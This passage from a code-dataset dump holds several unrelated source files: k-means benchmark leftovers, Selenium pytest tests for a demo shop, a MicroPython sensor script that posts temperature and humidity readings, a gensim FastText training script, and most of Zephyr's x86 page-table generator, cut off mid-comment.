'-+',label='Hamerly', c='r',linewidth=2)\r\n# # plt.plot(kk, t[3::5], '-<',label='kdtree', c='g',linewidth=2)\r\n# plt.plot(kk, t[4::5], '->',label='Drake', c='y',linewidth=2)\r\n# #\r\n# ## plt.plot(kk, s[0::2], label='square', c='k',linewidth=2)\r\n# ## plt.plot(kk, s[1::2], '*',label='sqrt', c='r',linewidth=2)\r\n# ##\r\n# plt.legend()\r\n# plt.grid()\r\n# plt.xlabel('dimensional')\r\n# ## plt.xlabel('number')\r\n# plt.ylabel('distance calculations')\r\n# # plt.ylabel('time')\r\n# plt.show()\r\n\r\n# print(np.sum(i - ii), np.sum(j)-np.sum(jj))\r\n\r\n #\r\n\r\n # i = drake(data , k, center)\r\n\r\n\r\n#[4,8,16,32,64]簇,全,以下均为高斯。\r\n# [10.359375,\r\n# 32.859375,\r\n# 65.59375,\r\n# 2.890625,\r\n# 11.5,\r\n# 40.15625,\r\n# 461.0625,\r\n# 515.71875,\r\n# 25.875,\r\n# 95.625,\r\n# 199.453125,\r\n# 
1763.96875,\r\n# 786.765625,\r\n# 87.984375,\r\n# 402.609375,\r\n# 702.640625,\r\n# 7337.625,\r\n# 1769.296875,\r\n# 776.75,\r\n# 940.953125]\r\n\r\n# 2\\4个簇,全\r\n# [12.609375,\r\n# 31.75,\r\n# 54.125,\r\n# 2.9375,\r\n# 11.84375,\r\n# 25.265625,\r\n# 81.015625,\r\n# 140.203125,\r\n# 5.90625,\r\n# 19.859375]\r\n\r\n# [2,4,8,16,32,64,128]簇,少naive\r\n#\r\n# [12.609375,\r\n# 31.75,\r\n# 2.9375,\r\n# 11.84375,\r\n# 25.265625,\r\n# 81.015625,\r\n# 5.90625,\r\n# 19.859375,\r\n# 45.453125,\r\n# 384.0,\r\n# 24.46875,\r\n# 87.890625,\r\n# 92.96875,\r\n# 589.71875,\r\n# 51.25,\r\n# 251.125,\r\n# 285.796875,\r\n# 1272.78125,\r\n# 174.265625,\r\n# 910.796875,\r\n# 475.9375,\r\n# 1794.984375,\r\n# 518.609375,\r\n# 989.671875,\r\n# 927.25,\r\n# 1905.0625,\r\n# 1170.28125,\r\n# 1423.6875]\r\n\r\n #\r\n # plt.plot(kk, t[1::4], label='Elkan', c='k',linewidth=2)\r\n # # plt.plot(kk, t[1::5], '--',label='standard', c='b',linewidth=2)\r\n # plt.plot(kk, t[0::4], '-+',label='Hamerly', c='r',linewidth=2)\r\n # plt.plot(kk, t[2::4], '-<',label='kdtree', c='g',linewidth=2)\r\n # plt.plot(kk, t[3::4], '->',label='Drake', c='y',linewidth=2)\r\n # plt.legend()\r\n # plt.grid()\r\n # plt.xlabel('k')\r\n # ## plt.xlabel('number')\r\n # plt.ylabel('time')\r\n # plt.show()\r\n\r\n\r\n","repo_name":"JiahongWu97/k_means","sub_path":"drake_b.py","file_name":"drake_b.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"73585952850","text":"import time\n\nimport pytest\n\nfrom pages.basket_page import BasketPage\nfrom pages.product_page import ProductPage\n\n\n@pytest.mark.parametrize('link', ['0', '1', '2', '3', '4', '5', '6',\n pytest.param(\"7\", marks=pytest.mark.xfail),\n '8', '9'])\ndef test_guest_can_add_product_to_basket(browser, link):\n link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer{link}\"\n page = ProductPage(browser, link)\n # инициализируем Page Object, передаем в конструктор экземпляр драйвера и url адрес\n page.open()\n page.add_product_in_basket()\n\n\n@pytest.mark.skip\ndef test_guest_cant_see_success_message_after_adding_product_to_basket(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.add_product_in_basket()\n page.should_not_be_success_message()\n\n\ndef test_guest_cant_see_success_message(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.should_not_be_success_message()\n\n\n@pytest.mark.skip\ndef test_message_disappeared_after_adding_product_to_basket(browser):\n link = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.add_product_in_basket()\n page.success_message_should_be_disappeared()\n\ndef test_guest_should_see_login_link_on_product_page(browser):\n link = \"http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/\"\n page = ProductPage(browser, link)\n page.open()\n page.should_be_login_link()\n\ndef test_guest_can_go_to_login_page_from_product_page(browser):\n link = \"http://selenium1py.pythonanywhere.com/en-gb/catalogue/the-city-and-the-stars_95/\"\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n\n\ndef test_guest_cant_see_product_in_basket_opened_from_main_page(browser):\n link = 
\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n page = ProductPage(browser, link)\n page.open()\n page.go_to_basket()\n basket = BasketPage(browser, link)\n basket.should_not_be_product_in_basket()\n basket.basket_should_be_empty()\n\n\n","repo_name":"Coriolan8/Finale_project_for_Python","sub_path":"test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35585667293","text":"import machine\nimport network\nimport socket\nimport dht\nimport os\nfrom time import sleep\n\n#Define privacy variable\nssid=''\t\t\t\t#your wifi ssid\nwifikey=''\t\t\t#your wifi key\nposturl=''\t\t\t#needs to be without http://\nd = dht.DHT11(machine.Pin(5)) \t#set the input pin for DHT11 sensor\n\nsta_if = network.WLAN(network.STA_IF)\nsta_if.active(True)\nsta_if.connect(ssid, wifikey)\n\ndef err_log(log):\n\tif os.stat('error.log')[6] > 200000:\n\t\tos.remove('error.log')\n\tstrerror=str(log)\n\tf=open('error.log', 'a')\n\tf.write(strerror+'\\n')\n\tf.close()\n\n\ndef http_get(url):\n\t_, _, host, path = url.split('/', 3)\n\ttry:\n\t\taddr = socket.getaddrinfo(host, 80)[0][-1]\n\texcept OSError as error:\n\t\terr_log(error)\n\ttry:\n\t\ts = socket.socket()\n\t\tconnect = s.connect(addr)\n\t\ts.send(bytes('GET /%s HTTP/1.0\\r\\nHost: %s\\r\\n\\r\\n' % (path, host), 'utf8'))\n\t\tsleep(5)\n\t\ts.close()\n\texcept NameError as error:\n\t\terr_log(error)\n\nwhile True:\n\ttry:\n\t\tif sta_if.isconnected() is False:\n\t\t\tsta_if.connect(ssid, wifikey)\n\t\t\tsleep(5)\n\t\t\td.measure()\n\t\t\thttp_get('http://%s/post.php?temperature=%s&humidity=%s&key=123456' %(posturl, d.temperature(), d.humidity()))\n\t\t\tsleep(300)\n\t\telse:\n\t\t\td.measure()\n\t\t\thttp_get('http://%s/post.php?temperature=%s&humidity=%s&key=123456' %(posturl, d.temperature(), d.humidity()))\n\t\t\tsleep(300)\n\texcept() as error:\n\t\tif KeyboardInterrupt:\n\t\t\tbreak\n\t\telse:\n\t\t\terr_log(error)\n\t\t\tpass\n","repo_name":"adrian-stoica/pythmeter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"12056990634","text":"from gensim.models.fasttext import load_facebook_model\nfrom gensim.models.callbacks import CallbackAny2Vec\nimport pickle\nfrom pathlib import Path\nimport logging\n\nlogging.basicConfig(format=\"%(asctime)s - %(message)s\", datefmt=\"%y-%m-%d %H:%M:%S\")\n\nlogging.warning('Read token file')\nstock_toks = pickle.loads(Path('output/tokens.pickle').read_bytes())\n\nclass callback(CallbackAny2Vec):\n \"\"\"Callback to print loss after each epoch.\"\"\"\n\n def __init__(self):\n self.epoch = 0\n\n def on_epoch_end(self, model):\n loss = model.get_latest_training_loss()\n logging.warning(f\"Loss after epoch {self.epoch}: {loss}\")\n self.epoch += 1\n\nlogging.warning('Load pretrained FastText model')\nmodel = load_facebook_model(Path('../jeszk_moments/hu.szte.w2v.fasttext.bin'))\nlogging.warning('Update vocabulary')\nmodel.build_vocab(stock_toks, update=True)\nmodel.workers = 40\n\nlogging.warning('Train model')\nmodel.train(\n corpus_iterable=stock_toks,\n total_examples=len(stock_toks),\n epochs=model.epochs,\n compute_loss=True,\n callbacks=[callback()],\n)\n\nlogging.warning('Save model')\nmodel.save('output/language_model/stock_language_model')\n\nlogging.warning('FastText training is 
done')","repo_name":"papsebestyen/huforpred","sub_path":"huforpred/fasttext/train_word_embedding.py","file_name":"train_word_embedding.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26831737619","text":"import sys\nimport array\nimport argparse\nimport ctypes\nimport os\nimport struct\nimport re\nimport textwrap\n\nfrom packaging import version\n\nimport elftools\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.sections import SymbolTableSection\n\nif version.parse(elftools.__version__) < version.parse('0.24'):\n sys.exit(\"pyelftools is out of date, need version 0.24 or later\")\n\n\ndef bit(pos):\n \"\"\"Get value by shifting 1 by pos\"\"\"\n return 1 << pos\n\n\n# Page table entry flags\nFLAG_P = bit(0)\nFLAG_RW = bit(1)\nFLAG_US = bit(2)\nFLAG_CD = bit(4)\nFLAG_SZ = bit(7)\nFLAG_G = bit(8)\nFLAG_XD = bit(63)\n\nFLAG_IGNORED0 = bit(9)\nFLAG_IGNORED1 = bit(10)\nFLAG_IGNORED2 = bit(11)\n\nENTRY_RW = FLAG_RW | FLAG_IGNORED0\nENTRY_US = FLAG_US | FLAG_IGNORED1\nENTRY_XD = FLAG_XD | FLAG_IGNORED2\n\n# PD_LEVEL and PT_LEVEL are used as list index to PtableSet.levels[]\n# to get table from back of list.\nPD_LEVEL = -2\nPT_LEVEL = -1\n\n\ndef debug(text):\n \"\"\"Display verbose debug message\"\"\"\n if not args.verbose:\n return\n sys.stdout.write(os.path.basename(sys.argv[0]) + \": \" + text + \"\\n\")\n\n\ndef verbose(text):\n \"\"\"Display --verbose --verbose message\"\"\"\n if args.verbose and args.verbose > 1:\n sys.stdout.write(os.path.basename(sys.argv[0]) + \": \" + text + \"\\n\")\n\n\ndef error(text):\n \"\"\"Display error message and exit program\"\"\"\n sys.exit(os.path.basename(sys.argv[0]) + \": \" + text)\n\n\ndef align_check(base, size, scope=4096):\n \"\"\"Make sure base and size are page-aligned\"\"\"\n if (base % scope) != 0:\n error(\"unaligned base address %x\" % base)\n if (size % scope) != 0:\n error(\"Unaligned region size 0x%x for base %x\" % (size, base))\n\n\ndef dump_flags(flags):\n \"\"\"Translate page table flags into string\"\"\"\n ret = \"\"\n\n if flags & FLAG_P:\n ret += \"P \"\n\n if flags & FLAG_RW:\n ret += \"RW \"\n\n if flags & FLAG_US:\n ret += \"US \"\n\n if flags & FLAG_G:\n ret += \"G \"\n\n if flags & FLAG_XD:\n ret += \"XD \"\n\n if flags & FLAG_SZ:\n ret += \"SZ \"\n\n if flags & FLAG_CD:\n ret += \"CD \"\n\n return ret.strip()\n\n\ndef round_up(val, align):\n \"\"\"Round up val to the next multiple of align\"\"\"\n return (val + (align - 1)) & (~(align - 1))\n\n\ndef round_down(val, align):\n \"\"\"Round down val to the previous multiple of align\"\"\"\n return val & (~(align - 1))\n\n\n# Hard-coded flags for intermediate paging levels. 
Permissive, we only control\n# access or set caching properties at leaf levels.\nINT_FLAGS = FLAG_P | FLAG_RW | FLAG_US\n\nclass MMUTable():\n \"\"\"Represents a particular table in a set of page tables, at any level\"\"\"\n\n def __init__(self):\n self.entries = array.array(self.type_code,\n [0 for i in range(self.num_entries)])\n\n def get_binary(self):\n \"\"\"Return a bytearray representation of this table\"\"\"\n # Always little-endian\n ctype = \"<\" + self.type_code\n entry_size = struct.calcsize(ctype)\n ret = bytearray(entry_size * self.num_entries)\n\n for i in range(self.num_entries):\n struct.pack_into(ctype, ret, entry_size * i, self.entries[i])\n return ret\n\n @property\n def supported_flags(self):\n \"\"\"Class property indicating what flag bits are supported\"\"\"\n raise NotImplementedError()\n\n @property\n def addr_shift(self):\n \"\"\"Class property for how much to shift virtual addresses to obtain\n the appropriate index in the table for it\"\"\"\n raise NotImplementedError()\n\n @property\n def addr_mask(self):\n \"\"\"Mask to apply to an individual entry to get the physical address\n mapping\"\"\"\n raise NotImplementedError()\n\n @property\n def type_code(self):\n \"\"\"Struct packing letter code for table entries. Either I for\n 32-bit entries, or Q for PAE/IA-32e\"\"\"\n raise NotImplementedError()\n\n @property\n def num_entries(self):\n \"\"\"Number of entries in the table. Varies by table type and paging\n mode\"\"\"\n raise NotImplementedError()\n\n def entry_index(self, virt_addr):\n \"\"\"Get the index of the entry in this table that corresponds to the\n provided virtual address\"\"\"\n return (virt_addr >> self.addr_shift) & (self.num_entries - 1)\n\n def has_entry(self, virt_addr):\n \"\"\"Indicate whether an entry is present in this table for the provided\n virtual address\"\"\"\n index = self.entry_index(virt_addr)\n\n return (self.entries[index] & FLAG_P) != 0\n\n def lookup(self, virt_addr):\n \"\"\"Look up the physical mapping for a virtual address.\n\n If this is a leaf table, this is the physical address mapping. If not,\n this is the physical address of the next level table\"\"\"\n index = self.entry_index(virt_addr)\n\n return self.entries[index] & self.addr_mask\n\n def map(self, virt_addr, phys_addr, entry_flags):\n \"\"\"For the table entry corresponding to the provided virtual address,\n set the corresponding physical entry in the table. Unsupported flags\n will be filtered out.\n\n If this is a leaf table, this is the physical address mapping. 
If not,\n this is the physical address of the next level table\"\"\"\n index = self.entry_index(virt_addr)\n\n verbose(\"%s: mapping 0x%x to 0x%x : %s\" %\n (self.__class__.__name__,\n phys_addr, virt_addr, dump_flags(entry_flags)))\n\n self.entries[index] = ((phys_addr & self.addr_mask) |\n (entry_flags & self.supported_flags))\n\n def set_perms(self, virt_addr, entry_flags):\n \"\"\"\"For the table entry corresponding to the provided virtual address,\n update just the flags, leaving the physical mapping alone.\n Unsupported flags will be filtered out.\"\"\"\n index = self.entry_index(virt_addr)\n\n verbose(\"%s: changing perm at 0x%x : %s\" %\n (self.__class__.__name__,\n virt_addr, dump_flags(entry_flags)))\n\n self.entries[index] = ((self.entries[index] & self.addr_mask) |\n (entry_flags & self.supported_flags))\n\n\n# Specific supported table types\nclass Pml4(MMUTable):\n \"\"\"Page mapping level 4 for IA-32e\"\"\"\n addr_shift = 39\n addr_mask = 0x7FFFFFFFFFFFF000\n type_code = 'Q'\n num_entries = 512\n supported_flags = INT_FLAGS\n\nclass Pdpt(MMUTable):\n \"\"\"Page directory pointer table for IA-32e\"\"\"\n addr_shift = 30\n addr_mask = 0x7FFFFFFFFFFFF000\n type_code = 'Q'\n num_entries = 512\n supported_flags = INT_FLAGS | FLAG_SZ | FLAG_CD\n\nclass PdptPAE(Pdpt):\n \"\"\"Page directory pointer table for PAE\"\"\"\n num_entries = 4\n\nclass Pd(MMUTable):\n \"\"\"Page directory for 32-bit\"\"\"\n addr_shift = 22\n addr_mask = 0xFFFFF000\n type_code = 'I'\n num_entries = 1024\n supported_flags = INT_FLAGS | FLAG_SZ | FLAG_CD\n\nclass PdXd(Pd):\n \"\"\"Page directory for either PAE or IA-32e\"\"\"\n addr_shift = 21\n addr_mask = 0x7FFFFFFFFFFFF000\n num_entries = 512\n type_code = 'Q'\n\nclass Pt(MMUTable):\n \"\"\"Page table for 32-bit\"\"\"\n addr_shift = 12\n addr_mask = 0xFFFFF000\n type_code = 'I'\n num_entries = 1024\n supported_flags = (FLAG_P | FLAG_RW | FLAG_US | FLAG_G | FLAG_CD |\n FLAG_IGNORED0 | FLAG_IGNORED1)\n\nclass PtXd(Pt):\n \"\"\"Page table for either PAE or IA-32e\"\"\"\n addr_mask = 0x07FFFFFFFFFFF000\n type_code = 'Q'\n num_entries = 512\n supported_flags = (FLAG_P | FLAG_RW | FLAG_US | FLAG_G | FLAG_XD | FLAG_CD |\n FLAG_IGNORED0 | FLAG_IGNORED1 | FLAG_IGNORED2)\n\n\nclass PtableSet():\n \"\"\"Represents a complete set of page tables for any paging mode\"\"\"\n\n def __init__(self, pages_start):\n \"\"\"Instantiate a set of page tables which will be located in the\n image starting at the provided physical memory location\"\"\"\n self.toplevel = self.levels[0]()\n self.page_pos = pages_start\n\n debug(\"%s starting at physical address 0x%x\" %\n (self.__class__.__name__, self.page_pos))\n\n # Database of page table pages. Maps physical memory address to\n # MMUTable objects, excluding the top-level table which is tracked\n # separately. 
Starts out empty as we haven't mapped anything and\n # the top-level table is tracked separately.\n self.tables = {}\n\n def get_new_mmutable_addr(self):\n \"\"\"If we need to instantiate a new MMUTable, return a physical\n address location for it\"\"\"\n ret = self.page_pos\n self.page_pos += 4096\n return ret\n\n @property\n def levels(self):\n \"\"\"Class hierarchy of paging levels, with the first entry being\n the toplevel table class, and the last entry always being\n some kind of leaf page table class (Pt or PtXd)\"\"\"\n raise NotImplementedError()\n\n def is_mapped(self, virt_addr, level):\n \"\"\"\n Return True if virt_addr has already been mapped.\n\n level_from_last == 0 only searches leaf level page tables.\n level_from_last == 1 searches both page directories and page tables.\n\n \"\"\"\n table = self.toplevel\n num_levels = len(self.levels) + level + 1\n has_mapping = False\n\n # Create and link up intermediate tables if necessary\n for depth in range(0, num_levels):\n # Create child table if needed\n if table.has_entry(virt_addr):\n if depth == num_levels:\n has_mapping = True\n else:\n table = self.tables[table.lookup(virt_addr)]\n\n if has_mapping:\n # pylint doesn't like break in the above if-block\n break\n\n return has_mapping\n\n def is_region_mapped(self, virt_base, size, level=PT_LEVEL):\n \"\"\"Find out if a region has been mapped\"\"\"\n align_check(virt_base, size)\n for vaddr in range(virt_base, virt_base + size, 4096):\n if self.is_mapped(vaddr, level):\n return True\n\n return False\n\n def new_child_table(self, table, virt_addr, depth):\n \"\"\"Create a new child table\"\"\"\n new_table_addr = self.get_new_mmutable_addr()\n new_table = self.levels[depth]()\n debug(\"new %s at physical addr 0x%x\"\n % (self.levels[depth].__name__, new_table_addr))\n self.tables[new_table_addr] = new_table\n table.map(virt_addr, new_table_addr, INT_FLAGS)\n\n return new_table\n\n def map_page(self, virt_addr, phys_addr, flags, reserve, level=PT_LEVEL):\n \"\"\"Map a virtual address to a physical address in the page tables,\n with provided access flags\"\"\"\n table = self.toplevel\n\n num_levels = len(self.levels) + level + 1\n\n # Create and link up intermediate tables if necessary\n for depth in range(1, num_levels):\n # Create child table if needed\n if not table.has_entry(virt_addr):\n table = self.new_child_table(table, virt_addr, depth)\n else:\n table = self.tables[table.lookup(virt_addr)]\n\n # Set up entry in leaf page table\n if not reserve:\n table.map(virt_addr, phys_addr, flags)\n\n def reserve(self, virt_base, size, to_level=PT_LEVEL):\n \"\"\"Reserve page table space with already aligned virt_base and size\"\"\"\n debug(\"Reserving paging structures for 0x%x (0x%x)\" %\n (virt_base, size))\n\n align_check(virt_base, size)\n\n # How much memory is covered by leaf page table\n scope = 1 << self.levels[PD_LEVEL].addr_shift\n\n if virt_base % scope != 0:\n error(\"misaligned virtual address space, 0x%x not a multiple of 0x%x\" %\n (virt_base, scope))\n\n for addr in range(virt_base, virt_base + size, scope):\n self.map_page(addr, 0, 0, True, to_level)\n\n def reserve_unaligned(self, virt_base, size, to_level=PT_LEVEL):\n \"\"\"Reserve page table space with virt_base and size alignment\"\"\"\n # How much memory is covered by leaf page table\n scope = 1 << self.levels[PD_LEVEL].addr_shift\n\n mem_start = round_down(virt_base, scope)\n mem_end = round_up(virt_base + size, scope)\n mem_size = mem_end - mem_start\n\n self.reserve(mem_start, mem_size, to_level)\n\n def 
map(self, phys_base, virt_base, size, flags, level=PT_LEVEL):\n \"\"\"Map an address range in the page tables provided access flags.\n If virt_base is None, identity mapping using phys_base is done.\n \"\"\"\n is_identity_map = virt_base is None or virt_base == phys_base\n\n if virt_base is None:\n virt_base = phys_base\n\n scope = 1 << self.levels[level].addr_shift\n\n debug(\"Mapping 0x%x (0x%x) to 0x%x: %s\" %\n (phys_base, size, virt_base, dump_flags(flags)))\n\n align_check(phys_base, size, scope)\n align_check(virt_base, size, scope)\n for paddr in range(phys_base, phys_base + size, scope):\n if is_identity_map and paddr == 0 and level == PT_LEVEL:\n # Never map the NULL page at page table level.\n continue\n\n vaddr = virt_base + (paddr - phys_base)\n\n self.map_page(vaddr, paddr, flags, False, level)\n\n def identity_map_unaligned(self, phys_base, size, flags, level=PT_LEVEL):\n \"\"\"Identity map a region of memory\"\"\"\n scope = 1 << self.levels[level].addr_shift\n\n phys_aligned_base = round_down(phys_base, scope)\n phys_aligned_end = round_up(phys_base + size, scope)\n phys_aligned_size = phys_aligned_end - phys_aligned_base\n\n self.map(phys_aligned_base, None, phys_aligned_size, flags, level)\n\n def map_region(self, name, flags, virt_to_phys_offset, level=PT_LEVEL):\n \"\"\"Map a named region\"\"\"\n if not isdef(name + \"_start\"):\n # Region may not exists\n return\n\n region_start = syms[name + \"_start\"]\n region_end = syms[name + \"_end\"]\n region_size = region_end - region_start\n\n region_start_phys = region_start\n\n if virt_to_phys_offset is not None:\n region_start_phys += virt_to_phys_offset\n\n self.map(region_start_phys, region_start, region_size, flags, level)\n\n def set_region_perms(self, name, flags, level=PT_LEVEL):\n \"\"\"Set access permissions for a named region that is already mapped\n\n The bounds of the region will be looked up in the symbol table\n with _start and _size suffixes. The physical address mapping\n is unchanged and this will not disturb any double-mapping.\"\"\"\n if not isdef(name + \"_start\"):\n # Region may not exists\n return\n\n # Doesn't matter if this is a virtual address, we have a\n # either dual mapping or it's the same as physical\n base = syms[name + \"_start\"]\n\n if isdef(name + \"_size\"):\n size = syms[name + \"_size\"]\n else:\n region_end = syms[name + \"_end\"]\n size = region_end - base\n\n if size == 0:\n return\n\n debug(\"change flags for %s at 0x%x (0x%x): %s\" %\n (name, base, size, dump_flags(flags)))\n\n num_levels = len(self.levels) + level + 1\n scope = 1 << self.levels[level].addr_shift\n\n align_check(base, size, scope)\n\n try:\n for addr in range(base, base + size, scope):\n # Never map the NULL page\n if addr == 0:\n continue\n\n table = self.toplevel\n for _ in range(1, num_levels):\n table = self.tables[table.lookup(addr)]\n table.set_perms(addr, flags)\n except KeyError:\n error(\"no mapping for %s region 0x%x (size 0x%x)\" %\n (name, base, size))\n\n def write_output(self, filename):\n \"\"\"Write the page tables to the output file in binary format\"\"\"\n written_size = 0\n\n with open(filename, \"wb\") as output_fp:\n for addr in sorted(self.tables):\n mmu_table = self.tables[addr]\n mmu_table_bin = mmu_table.get_binary()\n output_fp.write(mmu_table_bin)\n written_size += len(mmu_table_bin)\n\n # We always have the top-level table be last. This is because\n # in PAE, the top-level PDPT has only 4 entries and is not a\n # full page in size. 
We do not put it in the tables dictionary\n # and treat it as a special case.\n debug(\"top-level %s at physical addr 0x%x\" %\n (self.toplevel.__class__.__name__,\n self.get_new_mmutable_addr()))\n top_level_bin = self.toplevel.get_binary()\n output_fp.write(top_level_bin)\n written_size += len(top_level_bin)\n\n return written_size\n\n# Paging mode classes, we'll use one depending on configuration\nclass Ptables32bit(PtableSet):\n \"\"\"32-bit Page Tables\"\"\"\n levels = [Pd, Pt]\n\nclass PtablesPAE(PtableSet):\n \"\"\"PAE Page Tables\"\"\"\n levels = [PdptPAE, PdXd, PtXd]\n\nclass PtablesIA32e(PtableSet):\n \"\"\"Page Tables under IA32e mode\"\"\"\n levels = [Pml4, Pdpt, PdXd, PtXd]\n\n\ndef parse_args():\n \"\"\"Parse command line arguments\"\"\"\n global args\n\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter, allow_abbrev=False)\n\n parser.add_argument(\"-k\", \"--kernel\", required=True,\n help=\"path to prebuilt kernel ELF binary\")\n parser.add_argument(\"-o\", \"--output\", required=True,\n help=\"output file\")\n parser.add_argument(\"--map\", action='append',\n help=textwrap.dedent('''\\\n Map extra memory:\n ,[,[,]]\n where flags can be empty or combination of:\n L - Large page (2MB or 4MB),\n U - Userspace accessible,\n W - Writable,\n X - Executable,\n D - Cache disabled.\n Default is\n small (4KB) page,\n supervisor only,\n read only,\n and execution disabled.\n '''))\n parser.add_argument(\"-v\", \"--verbose\", action=\"count\",\n help=\"Print extra debugging information\")\n args = parser.parse_args()\n if \"VERBOSE\" in os.environ:\n args.verbose = 1\n\n\ndef get_symbols(elf_obj):\n \"\"\"Get all symbols from the ELF file\"\"\"\n for section in elf_obj.iter_sections():\n if isinstance(section, SymbolTableSection):\n return {sym.name: sym.entry.st_value\n for sym in section.iter_symbols()}\n\n raise LookupError(\"Could not find symbol table\")\n\ndef isdef(sym_name):\n \"\"\"True if symbol is defined in ELF file\"\"\"\n return sym_name in syms\n\n\ndef find_symbol(obj, name):\n \"\"\"Find symbol object from ELF file\"\"\"\n for section in obj.iter_sections():\n if isinstance(section, SymbolTableSection):\n for sym in section.iter_symbols():\n if sym.name == name:\n return sym\n\n return None\n\n\ndef map_extra_regions(pt):\n \"\"\"Map extra regions specified in command line\"\"\"\n # Extract command line arguments\n mappings = []\n\n for entry in args.map:\n elements = entry.split(',')\n\n if len(elements) < 2:\n error(\"Not enough arguments for --map %s\" % entry)\n\n one_map = {}\n\n one_map['cmdline'] = entry\n one_map['phys'] = int(elements[0], 0)\n one_map['size']= int(elements[1], 0)\n one_map['large_page'] = False\n\n flags = FLAG_P | ENTRY_XD\n if len(elements) > 2:\n map_flags = elements[2]\n\n # Check for allowed flags\n if not bool(re.match('^[LUWXD]*$', map_flags)):\n error(\"Unrecognized flags: %s\" % map_flags)\n\n flags = FLAG_P | ENTRY_XD\n if 'W' in map_flags:\n flags |= ENTRY_RW\n if 'X' in map_flags:\n flags &= ~ENTRY_XD\n if 'U' in map_flags:\n flags |= ENTRY_US\n if 'L' in map_flags:\n flags |= FLAG_SZ\n one_map['large_page'] = True\n if 'D' in map_flags:\n flags |= FLAG_CD\n\n one_map['flags'] = flags\n\n if len(elements) > 3:\n one_map['virt'] = int(elements[3], 16)\n else:\n one_map['virt'] = one_map['phys']\n\n mappings.append(one_map)\n\n # Map the regions\n for one_map in mappings:\n phys = one_map['phys']\n size = one_map['size']\n flags = one_map['flags']\n virt = 
one_map['virt']\n level = PD_LEVEL if one_map['large_page'] else PT_LEVEL\n\n # Check if addresses have already been mapped.\n # Error out if so as they could override kernel mappings.\n if pt.is_region_mapped(virt, size, level):\n error((\"Region 0x%x (%d) already been mapped \"\n \"for --map %s\" % (virt, size, one_map['cmdline'])))\n\n # Reserve space in page table, and map the region\n pt.reserve_unaligned(virt, size, level)\n pt.map(phys, virt, size, flags, level)\n\n\ndef main():\n \"\"\"Main program\"\"\"\n global syms\n parse_args()\n\n with open(args.kernel, \"rb\") as elf_fp:\n kernel = ELFFile(elf_fp)\n syms = get_symbols(kernel)\n\n sym_dummy_pagetables = find_symbol(kernel, \"dummy_pagetables\")\n if sym_dummy_pagetables:\n reserved_pt_size = sym_dummy_pagetables['st_size']\n else:\n reserved_pt_size = None\n\n if isdef(\"CONFIG_X86_64\"):\n pclass = PtablesIA32e\n elif isdef(\"CONFIG_X86_PAE\"):\n pclass = PtablesPAE\n else:\n pclass = Ptables32bit\n\n debug(\"building %s\" % pclass.__name__)\n\n vm_base = syms[\"CONFIG_KERNEL_VM_BASE\"]\n vm_size = syms[\"CONFIG_KERNEL_VM_SIZE\"]\n vm_offset = syms[\"CONFIG_KERNEL_VM_OFFSET\"]\n\n sram_base = syms[\"CONFIG_SRAM_BASE_ADDRESS\"]\n sram_size = syms[\"CONFIG_SRAM_SIZE\"] * 1024\n\n mapped_kernel_base = syms[\"z_mapped_start\"]\n mapped_kernel_size = syms[\"z_mapped_size\"]\n\n if isdef(\"CONFIG_SRAM_OFFSET\"):\n sram_offset = syms[\"CONFIG_SRAM_OFFSET\"]\n else:\n sram_offset = 0\n\n # Figure out if there is any need to do virtual-to-physical\n # address translation\n virt_to_phys_offset = (sram_base + sram_offset) - (vm_base + vm_offset)\n\n if isdef(\"CONFIG_ARCH_MAPS_ALL_RAM\"):\n image_base = sram_base\n image_size = sram_size\n else:\n image_base = mapped_kernel_base\n image_size = mapped_kernel_size\n\n image_base_phys = image_base + virt_to_phys_offset\n\n ptables_phys = syms[\"z_x86_pagetables_start\"] + virt_to_phys_offset\n\n debug(\"Address space: 0x%x - 0x%x size 0x%x\" %\n (vm_base, vm_base + vm_size - 1, vm_size))\n\n debug(\"Zephyr image: 0x%x - 0x%x size 0x%x\" %\n (image_base, image_base + image_size - 1, image_size))\n\n if virt_to_phys_offset != 0:\n debug(\"Physical address space: 0x%x - 0x%x size 0x%x\" %\n (sram_base, sram_base + sram_size - 1, sram_size))\n\n is_perm_regions = isdef(\"CONFIG_SRAM_REGION_PERMISSIONS\")\n\n # Are pages in non-boot, non-pinned sections present at boot.\n is_generic_section_present = isdef(\"CONFIG_LINKER_GENERIC_SECTIONS_PRESENT_AT_BOOT\")\n\n if image_size >= vm_size:\n error(\"VM size is too small (have 0x%x need more than 0x%x)\" % (vm_size, image_size))\n\n map_flags = 0\n\n if is_perm_regions:\n # Don't allow execution by default for any pages. We'll adjust this\n # in later calls to pt.set_region_perms()\n map_flags = ENTRY_XD\n\n pt = pclass(ptables_phys)\n # Instantiate all the paging structures for the address space\n pt.reserve(vm_base, vm_size)\n # Map the zephyr image\n if is_generic_section_present:\n map_flags = map_flags | FLAG_P\n pt.map(image_base_phys, image_base, image_size, map_flags | ENTRY_RW)\n else:\n # When generic linker sections are not present in physical memory,\n # the corresponding virtual pages should not be mapped to non-existent\n # physical pages. 
